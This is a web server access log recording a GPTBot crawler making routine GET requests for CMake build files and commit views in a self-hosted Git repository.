"/windpacer/windpacer/commits/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/a.out" [Client 74.7.227.38] [Length 9982] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/a.out" -[17/Feb/2026:16:44:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/a.out" [Client 74.7.227.38] [Length 21635] [Gzip 28.65] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/a.out" -[17/Feb/2026:16:44:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/a.out" [Client 74.7.227.38] [Length 12648] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/a.out" -[17/Feb/2026:16:44:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/cpp/CMakeFiles/progress.marks" [Client 74.7.227.38] [Length 10089] [Gzip 2.91] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/cpp/CMakeFiles/progress.marks" -[17/Feb/2026:16:44:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/TestApp.dir/flags.make" [Client 74.7.227.38] [Length 10527] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/TestApp.dir/flags.make" -[17/Feb/2026:16:44:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/cpp/CMakeFiles/progress.marks" [Client 74.7.227.38] [Length 10089] [Gzip 2.91] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/cpp/CMakeFiles/progress.marks" -[17/Feb/2026:16:44:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles/TestApp.dir/build.make" [Client 74.7.227.38] [Length 14255] [Gzip 8.36] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles/TestApp.dir/build.make" -[17/Feb/2026:16:44:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/TestApp.dir/build.make" [Client 74.7.227.38] [Length 14256] [Gzip 8.36] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/TestApp.dir/build.make" -[17/Feb/2026:16:44:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC" [Client 74.7.227.38] [Length 9964] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC" -[17/Feb/2026:16:44:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles/TestApp.dir/flags.make" [Client 74.7.227.38] [Length 10527] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles/TestApp.dir/flags.make" -[17/Feb/2026:16:44:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.d" [Client 74.7.227.38] [Length 14035] [Gzip 9.39] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.d" -[17/Feb/2026:16:44:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles/TestApp.dir/build.make" [Client 74.7.227.38] [Length 4694] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles/TestApp.dir/build.make" -[17/Feb/2026:16:44:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.d" [Client 74.7.227.38] [Length 9958] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.d" -[17/Feb/2026:16:44:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles/TestApp.dir/flags.make" [Client 74.7.227.38] [Length 194] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles/TestApp.dir/flags.make" -[17/Feb/2026:16:44:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/TestApp.dir/build.make" [Client 74.7.227.38] [Length 15262] [Gzip 4.80] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/TestApp.dir" -[17/Feb/2026:16:44:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.d" [Client 74.7.227.38] [Length 13307] [Gzip 4.76] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/TestApp.dir" -[17/Feb/2026:16:44:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/TestApp.dir/flags.make" [Client 74.7.227.38] [Length 194] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/TestApp.dir/flags.make" -[17/Feb/2026:16:44:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.txt" [Client 74.7.227.38] [Length 11190] [Gzip 3.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/TestApp.dir" -[17/Feb/2026:16:44:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.txt" [Client 74.7.227.38] [Length 11189] [Gzip 3.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/TestApp.dir" -[17/Feb/2026:16:44:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/cpp/CMakeFiles/progress.marks" [Client 74.7.227.38] [Length 11170] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/cpp/CMakeFiles" -[17/Feb/2026:16:44:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles/TestApp.dir/build.make" [Client 74.7.227.38] [Length 15265] [Gzip 4.80] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles/TestApp.dir" -[17/Feb/2026:16:44:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/cpp/CMakeFiles/progress.marks" [Client 74.7.227.38] [Length 2] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/cpp/CMakeFiles/progress.marks" -[17/Feb/2026:16:44:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.txt" [Client 74.7.227.38] [Length 11189] [Gzip 3.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles/TestApp.dir" -[17/Feb/2026:16:44:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.d" [Client 74.7.227.38] [Length 13308] [Gzip 4.76] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles/TestApp.dir" -[17/Feb/2026:16:44:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/TestApp.dir/build.make" [Client 74.7.227.38] [Length 15263] [Gzip 4.80] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/TestApp.dir" -[17/Feb/2026:16:44:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/TestApp.dir/build.make" [Client 74.7.227.38] [Length 9961] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/TestApp.dir/build.make" -[17/Feb/2026:16:44:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/TestApp.dir/build.make" [Client 74.7.227.38] [Length 14252] [Gzip 8.36] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/TestApp.dir/build.make" -[17/Feb/2026:16:44:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.d" [Client 74.7.227.38] [Length 14034] [Gzip 9.40] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.d" -[17/Feb/2026:16:44:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.txt" [Client 74.7.227.38] [Length 9958] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.txt" -[17/Feb/2026:16:44:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.txt" [Client 74.7.227.38] [Length 9957] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.txt" -[17/Feb/2026:16:44:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/cpp/CMakeFiles/progress.marks" [Client 74.7.227.38] [Length 10011] [Gzip 2.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/cpp/CMakeFiles/progress.marks" -[17/Feb/2026:16:44:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles/TestApp.dir/build.make" [Client 74.7.227.38] [Length 9961] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles/TestApp.dir/build.make" -[17/Feb/2026:16:44:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles/TestApp.dir/build.make" [Client 74.7.227.38] [Length 14255] [Gzip 8.36] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles/TestApp.dir/build.make" -[17/Feb/2026:16:44:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.txt" [Client 74.7.227.38] [Length 9958] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.txt" -[17/Feb/2026:16:44:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/cpp/CMakeFiles/progress.marks" [Client 74.7.227.38] [Length 10091] [Gzip 2.91] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/cpp/CMakeFiles/progress.marks" -[17/Feb/2026:16:44:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/TestApp.dir/build.make" [Client 74.7.227.38] [Length 9960] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/TestApp.dir/build.make" -[17/Feb/2026:16:44:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/TestApp.dir/build.make" [Client 74.7.227.38] [Length 14254] [Gzip 8.36] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/TestApp.dir/build.make" -[17/Feb/2026:16:44:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles/TestApp.dir/build.make" [Client 74.7.227.38] [Length 4694] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles/TestApp.dir/build.make" -[17/Feb/2026:16:44:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.txt" [Client 74.7.227.38] [Length 10098] [Gzip 2.91] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.txt" -[17/Feb/2026:16:44:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.txt" [Client 74.7.227.38] [Length 113] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.txt" -[17/Feb/2026:16:44:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.txt" [Client 74.7.227.38] [Length 10098] [Gzip 2.91] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.txt" -[17/Feb/2026:16:44:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/TestApp.dir/build.make" [Client 74.7.227.38] [Length 4694] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/TestApp.dir/build.make" -[17/Feb/2026:16:44:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.d" [Client 74.7.227.38] [Length 2951] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.d" -[17/Feb/2026:16:44:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.d" [Client 74.7.227.38] [Length 2951] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.d" -[17/Feb/2026:16:44:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.d" [Client 74.7.227.38] [Length 9957] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.d" -[17/Feb/2026:16:44:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/TestApp.dir/build.make" [Client 74.7.227.38] [Length 4694] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/TestApp.dir/build.make" -[17/Feb/2026:16:44:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/cpp/CMakeFiles/progress.marks" [Client 74.7.227.38] [Length 2] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; 